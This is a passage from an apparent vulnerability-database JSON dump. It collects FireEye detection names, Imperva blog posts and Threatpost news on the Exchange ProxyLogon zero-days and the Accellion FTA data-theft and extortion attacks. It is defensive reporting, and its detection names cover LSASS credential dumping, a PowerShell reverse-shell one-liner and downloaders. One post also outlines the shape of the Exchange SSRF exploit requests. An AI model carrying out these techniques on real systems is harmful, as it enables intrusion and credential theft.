\n\n**_Detection Name_** \n \n---|--- \n \n * Network Security \n * Email Security \n * Detection On Demand \n * Malware File Scanning \n * Malware File Storage Scanning \n| \n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855 \n \nEndpoint Security\n\n| \n\n**_Real-Time (IOC)_**\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n**_Malware Protection (AV/MG)_**\n\n * Trojan.Agent.Hafnium.A\n\n**_Module Coverage_**\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility. \n \nHelix\n\n| \n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T22:30:00", "type": "fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T22:30:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-03-09T20:27:10", "description": "At the end of last year, enterprise firewall company Accellion was the victim of a two-phase [SQL injection attack](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>) that resulted in significant sensitive data breaches over the last number of months. This attack is important for several reasons. It underscores the [rise in frequency](<https://www.identityforce.com/blog/2020-data-breaches>) of incidents leading to public breaches, and highlights SQL injections as an increasingly popular way for attackers to cause major damage. Imperva Research Labs are consistently seeing SQL injection as a [preferred attack](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) method. More importantly (and frankly, what should scare the pants off everyone), the analysis of this breach confirms that attackers and their methods are becoming more creative and sophisticated. To stop them, organizations need to put greater effort into analyzing and monitoring the data layer. When organizations combine data-centric threat mitigation with protecting all paths to their data, they have a far better posture to stop sophisticated breaches like this in their tracks.\n\n### Learning from the timeline of events\n\nLet\u2019s take a closer look at the details of this attack and explain why understanding how it happened is critical to stopping similar attacks in the future.\n\nIn December 2020, attackers exploited a single zero-day vulnerability in enterprise firewall company Accellion\u2019s File Transfer Appliance (FTA) technology to steal customer data, credit information, and personal data such as birthdates and email addresses subsequently to use as leverage in ongoing extortion attempts.\n\nA post-breach analysis of the attack revealed that the attacker(s) chained together the following vulnerabilities in their content firewall: SQL Injection (CVE-2021-27101) and OS Command Execution (CVE-2021-27104). The attacker leveraged the SQL Injection vulnerability against the file document_root.html to retrieve \u201cW\u201d keys from the Accellion FTA database. Accellion issued a patch to mitigate the vulnerabilities less than 72 hours after discovery.\n\nAfter the December 20, 2020 release of Accellion\u2019s patch, which remediated the vulnerabilities associated with the December exploit, the attacker changed their entry point and employed a new technique involving ServerSide Request Forgery (SSRF) (CVE-2021-27103) and OS Command Execution (CVE-2021-27102). The attacker\u2019s strategy was clear: a two-phase approach with the first targeting vulnerabilities in the content firewall and the second targeting the database where the customer data was held.\n\n### Attack techniques used in the Accellion breach are likely to continue\n\nToday\u2019s cyber attacks are becoming ever more creative, sophisticated and well-funded, in many cases by nation states. As a result, the attackers now have the resources to learn how the software of a target organization works. They have the resources to stay abreast of trends and vulnerabilities, increasing their capacity to make more sophisticated attacks. To get the highest return on their investment, attackers and their sponsors choose organizations whose applications and appliances are widely used and trusted by thousands of customers, like Accellion\u2019s FTA.\n\nAs in the 2020 [SolarWinds breach](<https://www.imperva.com/blog/2020-ends-with-a-bang/>), the attackers didn\u2019t just exploit vulnerabilities to compromise a target system, they were knowledgeable enough to run a clean-up routine to erase evidence of the activity. In the Accellion case, the attackers took the time to reverse-engineer their target\u2019s software and figure out the best way to breach their content firewall. When Accellion shut down that path, they already had a plan to attack the database itself. Attacking a company like Accellion that facilitates secure file transfers is particularly brazen. Irony notwithstanding, it makes sense. Accellion enterprise customers using secure file transfers are very likely to be moving around the exact data that an attacker wants to steal. In the end, the attackers were also able to weaponize the data and use it for global extortion attempts that are [likely to continue](<https://www.wired.com/story/accellion-breach-victims-extortion/>) for many months.\n\n### An optimal data security posture thwarts these new breeds of attacks\n\nThe Accellion breach started with a SQL injection attack. Just using SQL injection, the attackers managed to complete a successful attack. This illustrates very clearly the absolute need to do analytics and threat detection at the data layer. The lowest common denominator in all applications is the data repository layer - all apps and all systems store data somewhere. Most applications use a database although in today\u2019s modern architecture landscape many things can and should be classified as a database even if technically they are not a DBMS. At the end of the day, you can discover almost any attack just by looking at the data layer because every application has a data component.\n\nGoing back to the [Imperva Research Lab\u2019s data](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) and seeing the chronic and persistent frequency with which SQL injection results in attacks, it seems that organizations still are not paying enough attention to securing the data layer. In the SolarWinds case, as well as this Accellion breach, monitoring at the data level with machine learning model-driven [behavior analytics](<https://www.imperva.com/learn/data-security/ueba-user-and-entity-behavior-analytics/>) and [automated detection](<https://www.imperva.com/products/data-risk-analytics/>) of non-compliant, risky, or malicious data access behavior would have brought up-front attention to these attacks.\n\nThe other thing we learn from the Accellion breach is that one must protect all paths to the data. When the content firewall protection fails, you must have internal protection in place to stop attacks. In the Accellion case, they only fixed a part of the problem after the first breach. They mitigated the first vulnerability - but most of the attack itself stayed the same when the attacker launched the second phase of the breach. The attackers changed only the entry point until they gained the ability to run an OS command. From there, the rest of the attack followed the pattern of the first, they only had to find a different first step. This highlights the critical importance for organizations to secure all access points as a matter of course. Imperva is dedicated not only to securing data, but securing all paths to the data. Imperva helps organizations take a holistic approach to security and execute both application monitoring and database monitoring.\n\nThe post [Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack](<https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T19:39:36", "type": "impervablog", "title": "Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-09T19:39:36", "id": "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "href": "https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-29T14:27:27", "description": "### Introduction\n\nOn 2 March 2021, [Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [Veloxity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) produced disclosures outlining the discovery of four zero day vulnerabilities affecting multiple versions of Microsoft Exchange Server. Each of the vulnerabilities have been attributed a severity rating from high to critical, however the most impactful statement from both Microsoft and Veloxity was that these vulnerabilities formed an attack chain which was being actively exploited in the wild.\n\nSince the publication of these disclosures, details have emerged regarding the observed source of the exploitation of these vulnerabilities. The attacks are being widely attributed to the state-sponsored group dubbed Hafnium, [alleged](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to be operating out of China.\n\nThe most notable of the new CVEs, [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), is a SSRF vulnerability in Microsoft Exchange which allows an attacker to induce the server into performing \u201cunintended actions\u201d through the use of a series of specially crafted POST requests. The attacker can leverage this vulnerability to exploit the other CVEs to perform malicious actions, such as dump private email, or even achieve remote code execution.\n\nImperva has put dedicated security rules in place to protect our customers in a direct response to the initial disclosures. Imperva has also performed analysis on the attempted exploitation of these CVEs and we have produced the following insights.\n\n### Observations and Statistics\n\nSince the 2 March disclosures, Imperva has observed over **44k** scanning and exploitation attempt sessions in the wild from over **1,600** unique source IPs, related to the Microsoft Exchange [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) SSRF. From this data, we have been able to identify the most targeted industries and countries which have been affected by the vulnerability in the aftermath of the disclosures.\n\n### Targeted Industries\n\nOne of the key observations we have made is that this vulnerability has impacted almost every category of industry, this observation is explained by how ubiquitous the use of Microsoft Exchange is across all sectors. According to our data, the Computing &amp; IT sector was the most targeted industry, with 21% of all targeted sites belonging to this category. Next was Financial Services with 18%, and Telecoms and ISPs completed the top 3 with 10.5%. Below we show the breakdown of scanning and exploitation attempts against various industries.\n\n### Targeted Countries\n\nImperva observed both scanning and exploitation attempts against sites worldwide, with the US being the most targeted country, with the UK and Singapore a distant second and third, respectively.\n\n### Source Countries\n\nImperva observed that since the disclosures, relatively few scanning and exploitation attempts have been made from Chinese sources. This could be because exploitation, and to a greater extent, scanning has shifted to the wider public. It may also be because the attackers are using proxies to carry out the attacks. The chart below shows the top attacking countries by session count observed by Imperva analysts since the disclosures.\n\n### Attacker IP Reputation\n\nImperva\u2019s IP reputation allows for the identification of potentially suspicious or malicious behaviour by means of tagging relevant IPs. From this data, **42.3%** of the attacker source IPs were previously tagged by Imperva as having exhibited malicious behaviour and **8.45%** of the attacker source IPs were previously tagged by Imperva as being identified as vulnerability scanners.\n\n### Observed Attacker Activity\n\nImperva analysts have observed various indicators of the attempted exploitation of the Microsoft Exchange Hafnium [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) in the wild, indicating various motives on the part of the attackers. As mentioned previously, an attacker can leverage the vulnerability to perform various unauthorized actions, including the collection of private information, and even the writing of arbitrary files to the server resulting in remote code execution. In this section, we will discuss some of the requests we have observed and the perceived intentions and motivation of the attackers.\n\nDetailed descriptions of how the exploit chain works, and how it can be exploited are available at various different sources [[1](<https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265>)][[2](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>)], however the important thing to understand is that the vulnerability allows an attacker to send malicious requests to various backend components in Microsoft Exchange by means of a specially crafted POST request to either the Outlook Web Application or the Exchange Admin Centre, where the \u201cX-BEResource\u201d and \u201cX-AnonResource-Backend&quot; cookie values can be manipulated to specify the targeted resource. In our investigation following the disclosures we have observed the following in our data.\n\n### Crafted requests to /EWS/Exchange.asmx\n\nA common exploit request observed by Imperva attempting to exploit the CVE-2021-26855 SSRF vulnerability was a POST request to Exchange Admin Centre (/ecp/) and Outlook Web Application endpoints (/owa/) endpoint, with the crafted cookie value endpoints set to the Exchange Web Services endpoint \u201c/EWS/Exchange.asmx\u201d. This allows the attacker to gain authenticated access to private mail on the server. This request accounted for **18%** of exploitation attempts observed.\n\n### Crafted requests to /autodiscover/autodiscover.xml\n\nThe most common exploitation attempt of the SSRF observed by Imperva analysts were requests to the Exchange Admin Centre endpoint (/ecp), with the vulnerabile cookie set with the FQDN of the server, and the endpoint of /autodiscover/autodiscover.xml.\n\nAutodiscover in Exchange is a service which allows for the rapid collection of Exchange configurations, service URLs and supported protocols, therefore it makes an obvious target for attackers who are attempting to quickly gather information, escalate privileges and maintain persistence. In the case of this vulnerability the autodiscover service could be used to gather the information required for further exploitation of the other CVEs associated with the chain. This request accounted for **51%** of exploitation attempts observed.\n\n### Crafted requests to /mapi/emsmdb\n\nAnother pattern Imperva analysts observed were crafted POST requests to the Exchange Admin Centre (/ecp), with the cookie value crafted with the **/mapi/emsmdb** endpoint.\n\nResearch into the published exploits and disclosures indicate that the \u201c/mapi/emsmdb\u201d endpoint can be abused to procure a valid SID, which can then allow the attacker to gain privileges to the Exchange \u201c**proxyLogin.ecp**\u201d endpoint (Exchange HTTP proxy), which can in turn be used to obtain a valid \u201c**ASP.NET_SessionID**\u201d and \u201c**msExchEcpCanary**\u201d values which are required for further chained exploitation of MS exchange. This request accounted for **3%** of exploitation attempts observed.\n\n### How Imperva protects you\n\nImperva has implemented rules in [Cloud WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) and [On Prem WAF](<https://www.imperva.com/products/web-application-firewall-waf/>), which are effective against all exploitation of CVE-2021-26855. These rules are also effective against the chained exploitation of the subsequent CVEs: [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>).\n\n### Check if you have been compromised\n\nSince the disclosures of these zero day vulnerabilities, various news articles have been published reporting mass exploitation [[1](<https://www.bbc.com/news/technology-56372188>)][[2](<https://www.zdnet.com/article/microsoft-exchange-server-zero-day-attacks-malicious-software-found-on-2300-machines-in-uk/>)]. We recommend that if you have unpatched exchange servers in your organization, you apply the latest patches from Microsoft as soon as possible, and use the following [guide](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) from Microsoft to check for any indicators of compromise.\n\nThe post [Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures](<https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T15:06:38", "type": "impervablog", "title": "Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-26T15:06:38", "id": "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "href": "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-03-23T14:28:35", "description": "Energy giant Royal Dutch Shell is the latest victim of a series of attacks on users of the Accellion legacy File Transfer Appliance (FTA) product, which already has affected numerous companies and been [attributed](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) to the FIN11 and the Clop ransomware gang.\n\n\u201cShell has been impacted by a data-security incident involving Accellion\u2019s File Transfer Appliance,\u201d the company revealed [on its website](<https://www.shell.com/energy-and-innovation/digitalisation/news-room/third-party-cyber-security-incident-impacts-shell.html>) last week. \u201cShell uses this appliance to securely transfer large data files.\u201d\n\nAttackers \u201cgained access to \u201cvarious files\u201d containing personal and company data from both Shell and some of its stakeholders, acknowledged the company. However, because its Accellion implementation its core IT systems were unaffected by the breach, \u201cas the file transfer service is isolated from the rest of Shell\u2019s digital infrastructure,\u201d the company said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nShell, the fifth largest company in the world, also revealed several of its global petrochemical and energy company affiliates were impacted.\n\nAccording to the company, once it learned of the incident, Shell immediately addressed the vulnerabilities with its service provider and cybersecurity team, and started an investigation to better understand the nature and extent of the incident.\n\n\u201cShell is in contact with the impacted individuals and stakeholders and we are working with them to address possible risks,\u201d the company said in a statement. \u201cWe have also been in contact with relevant regulators and authorities and will continue to do so as the investigation continues.\u201d\n\nShell did not say specifically how attackers accessed its Accellion implementation, but the breach is likely related to a series of attacks on vulnerabilities in Accellion FTA, a 20-year-old legacy product used by large corporations around the world. Accellion revealed that it became aware of a then zero-day security vulnerability in the product in mid-December, and subsequently scrambled to patch it.\n\nHowever, the first flaw turned out to be just one of a cascade of now patched zero-day bugs in the platform that Accellion discovered only after they came under attack from cyber-adversaries well into the new year, the company acknowledged. Other victims of third-party attacks on Accellion FTA include [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>) and [telecom giant Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>).\n\nEventually, four security vulnerabilities ([CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)) were found to be exploited in the attacks, according to the investigation. Accellion tried to patch each subsequent vulnerability as soon as it was discovered; however, as evidenced by Shell\u2019s disclosure, unpatched systems likely remain and further attacks seem likely.\n\nIndeed, patching is a complicated endeavor even for the most well-run IT organizations and many companies struggle to achieve complete coverage across their environments, observed Chris Clements, vice president of solutions architecture for cybersecurity firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost.\n\n\u201cThis is especially true for non-Microsoft Windows based systems, the unfortunate reality is that for many organizations, their patching strategy starts and stops with Windows,\u201d he said. \u201cInfrastructure equipment and especially network appliances like Accellion often lag significantly in patch adoption.\u201d\n\nThere are a number of reasons for why patches aren\u2019t immediately applied when they\u2019re made available, including lack of communication from vendors when patches are released, complex and manual patching processes, and organizational confusion around who\u2019s responsible for patch application, Clements added.\n\nThe Accellion attacks also once again shed light on the importance of choosing technology partners carefully when relying on them for critical digital processes that are exposed to potential exploit, said another security expert.\n\n\u201cThe Shell data breach illustrates the criticality of securing vendors and ensuring their systems don\u2019t compromise your own business,\u201d Demi Ben-Ari, CTO and co-founder of security firm [Panorays](<https://www.panorays.com/>) said in an email to Threatpost. \u201cVulnerabilities in vendors\u2019 legacy software can serve as an easy gateway to breach data in target companies \u2014 or worse.\u201d\n\n**_[Register for this LIVE Event](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)_****_: 0-Day Disclosures: Good, Bad &amp; Ugly:_** **_On Mar. 24 at 2 p.m. ET_**_, Threatpost_ tackles how vulnerability disclosures can pose a risk to companies. To be discussed, Microsoft 0-days found in Exchange Servers. Join 0-day hunters from Intel Corp. and veteran bug bounty researchers who will untangle the 0-day economy and unpack what\u2019s on the line for all businesses when it comes to the disclosure process. [Register NOW](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>) for this **LIVE **webinar on Wed., Mar. 24.\n", "cvss3": {}, "published": "2021-03-23T14:16:14", "type": "threatpost", "title": "Energy Giant Shell Is Latest Victim of Accellion Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-23T14:16:14", "id": "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "href": "https://threatpost.com/shell-victim-of-accellion-attacks/164973/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-22T18:12:09", "description": "Researchers have identified a set of threat actors (dubbed UNC2546 and UNC2582) with connections to the FIN11 and the Clop ransomware gang as the cybercriminal group behind the global zero-day attacks on users of the Accellion legacy File Transfer Appliance product.\n\n[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nMultiple Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), have all been attacked by the group, receiving extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website, according to an investigation from Accellion and FireEye Mandiant. Around 100 companies have been victims of the attack, analysts found, with around 25 suffering \u201csignificant data theft.\u201d No ransomware was used in the attacks.\n\n\u201cNotably, the number of victims on the \u201cCL0P^_- LEAKS\u201d shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada and the Netherlands recently outed by these threat actors,\u201d according to the Mandiant findings, [issued on Monday](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploitedfor-data-theft-and-extortion.html>).\n\n## **4 Accellion FTA Zero-Days **\n\nAs noted, the point of entry for the attacks was Accellion FTA, a 20-year-old legacy product used by large corporations around the world. Accellion said that it became aware of a zero-day security vulnerability in FTA in mid-December, which it scrambled to patch quickly. But that turned out to be just one of a cascade of zero-days in the platform that the company discovered only after they came under attack from cyber-adversaries.\n\n\u201cThis initial incident was the beginning of a concerted cyberattack on the Accellion FTA product that continued into January 2021,\u201d the company explained. \u201cAccellion identified additional exploits in the ensuing weeks, and rapidly developed and released patches to close each vulnerability.\u201d\n\nFour zero-day security holes were exploited in the attacks, according to the investigation:\n\n * CVE-2021-27101 \u2013 SQL injection via a crafted Host header\n * CVE-2021-27102 \u2013 OS command execution via a local web service call\n * CVE-2021-27103 \u2013 SSRF via a crafted POST request\n * CVE-2021-27104 \u2013 OS command execution via a crafted POST request\n\nAnd, the published victim data appears to have been stolen using a distinct \u201cDEWMODE\u201d web shell, according to Mandiant, which added, \u201cThe exfiltration activity has affected entities in a wide range of sectors and countries.\u201d\n\n## **DEWMODE Web Shell for Stealing Information**\n\nMandiant found that a specific web shell, which it calls DEWMODE, was used to exfiltrate data from Accellion FTA devices. The adversaries first exploited one of the zero-days, then used that access to install DEWMODE.\n\n\u201cAcross these incidents, Mandiant observed common infrastructure usage and TTPs [tactics, techniques and procedures], including exploitation of FTA devices to deploy the DEWMODE web shell,\u201d Mandiant determined. \u201cA common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546\u2019s activities.\u201d\n\nThe firm is still analyzing the zero-day exploitation, but it did say that in the early attacks in December, UNC2546 leveraged an SQL injection vulnerability in the Accellion FTA as its primary intrusion vector. SQL injection was then followed by subsequent requests to additional resources.\n\n\u201cUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php,\u201d according to the analysis. \u201cImmediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api. Almost immediately following this sequence, the DEWMODE web shell is written to the system.\u201d\n\nDEWMODE, once embedded, extracts a list of available files from a MySQL database on the FTA and lists those files and corresponding metadata\u2014file ID, path, filename, uploader and recipient\u2014on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell.\n\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz \u2013 an archive that likely contained a dump of a database.\n\n## **Extortion via Clop Leaks Site**\n\nOnce DEWMODE was installed, victims began to receive extortion emails from an actor claiming association with the Clop ransomware team gang.\n\nThese are tailored to each victim and sent from a free email account, to a small number of addresses at the victim organization. If the victim did not respond in a timely manner, more emails are sent, this time to hundreds or thousands of different email accounts, using varied SMTP infrastructure.\n\n\n\nThe initial extortion note sent to victims of the Accellion FTA attacks. Source: FireEye Mandiant.\n\n\u201cIn at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat,\u201d according to Mandiant.\n\nThe firm also found through monitoring the CL0P^_- LEAKS shaming website that UNC2582 has followed through on threats to publish stolen data.\n\n\u201cSeveral new victims have appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted,\u201d according to Mandiant.\n\n## **FIN11, Clop and UNC2546**\n\nFIN11 is a financially motivated group that has been around for at least four years, conducting widespread phishing campaigns. However, it continues to evolve. It added the use of Clop ([which emerged](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/>) in February 2019) [and double extortion in October](<https://threatpost.com/fin11-gang-double-extortion-ransomware/160089/>); and added point-of-sale (POS) malware to its arsenal in 2018. In 2019, it started conducting run-of-the-mill ransomware attacks.\n\nMandiant has previously found that FIN11 threatened to post stolen victim data on the same .onion site used in the Accellion FTA attacks, usually in a double-extortion demand following the deployment of Clop ransomware. However, researchers found that the cybercriminals involved in these latest attacks are likely distinct from FIN11 itself despite sharing some overlaps.\n\n\u201cWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582,\u201d according to Mandiant. \u201cWe have identified overlaps between UNC2582, UNC2546 and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity.\u201d\n\nSome of the overlaps between UNC2582\u2019s data-theft extortion activity and prior FIN11 operations include common email senders.\n\n\u201cSome UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group,\u201d according to the analysis.\n\nFIN11 has also used same the CL0P^_- LEAKS shaming site and is known for deploying Clop ransomware.\n\n\u201cThe UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page,\u201d according to Mandiant. \u201cThe linked websites were the same ones used to support historical Clop operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\u201d\n\nWhen it comes to the zero-day cluster of activity, attributed to UNC2546, there are also limited overlaps with FIN11. Specifically, many of the organizations compromised by UNC2546 were previously targeted by FIN11.\n\nAnd, \u201can IP address that communicated with a DEWMODE web shell was in the \u2018Fortunix Networks L.P.\u2019 netblock, a network frequently used by FIN11 to host download and [FRIENDSPEAK command-and-control (C2) domains](<https://threatpost.com/us-finance-sector-targeted-backdoor-campaign/152634/>).\u201d\n\nThere\u2019s also a connection between UNC2546 and UNC2582, the firm found: In at least one case, the UNC2546 attackers interacted with DEWMODE from a host that was used to send UNC2582-attributed extortion email.\n\n\u201cThe overlaps between FIN11, UNC2546 and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships,\u201d Mandiant concluded. \u201cOne of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks.\u201d\n\nAlso, using SQL injection to deploy DEWMODE would represent a significant shift in FIN11 TTPs, \u201cgiven the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities,\u201d Mandiant added.\n\n### _Is your small- to medium-sized business an easy mark for attackers? _\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c_**15 Cybersecurity 